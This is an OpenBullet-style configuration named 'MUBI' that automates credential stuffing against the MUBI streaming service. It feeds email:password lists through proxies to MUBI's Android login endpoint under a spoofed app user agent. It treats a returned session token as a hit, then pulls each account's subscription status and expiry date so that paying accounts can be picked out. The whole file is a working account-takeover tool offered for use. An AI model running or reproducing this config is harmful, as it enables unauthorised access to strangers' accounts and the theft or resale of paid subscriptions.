[SETTINGS]
{
  "Name": "MUBI",
  "SuggestedBots": 50,
  "LastModified": "2018-09-06T18:53:34.6349368+00:00",
  "AdditionalInfo": "",
  "Author": "SubAtomic",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#POST_LOGIN REQUEST POST "https://mubi.com/services/android/sessions?client=android" AutoRedirect=TRUE 
  CONTENT "{\"udid\":576744796764390264,\"token\":\"\",\"client\":\"android\",\"client_version\":\"4.18\",\"email\":\"<USER>\",\"password\":\"<PASS>\"}" 
  CONTENTTYPE "application/json; charset=utf-8" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: okhttp/3.8.1" 
  HEADER "Pragma: no-cache" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Success OR 
    KEY "token" 
  KEYCHAIN Failure OR 
    KEY "<SOURCE>" DoesNotContain "token" 
#PARSE_TOKEN PARSE "<SOURCE>" JSON "token" Recursive=FALSE -> VAR "TOKEN" "" "" 
#REQUEST_PROFILE REQUEST GET "https://mubi.com/services/android/current_user?country=US&token=<TOKEN>&udid=576744796764390264&client=android&client_version=4.18" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "application/json" 
  HEADER "Accept: */*" 
  HEADER "User-Agent: okhttp/3.8.1" 
  HEADER "Pragma: no-cache" 
#PARSE_SUB_STATUS PARSE "<SOURCE>" JSON "active_subscriber" Recursive=FALSE -> CAP "SUBSCRIBER" "" "" 
#PARSE_EXP PARSE "<SOURCE>" JSON "expires_at" Recursive=FALSE -> CAP "EXP" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "active_subscriber\":false" 
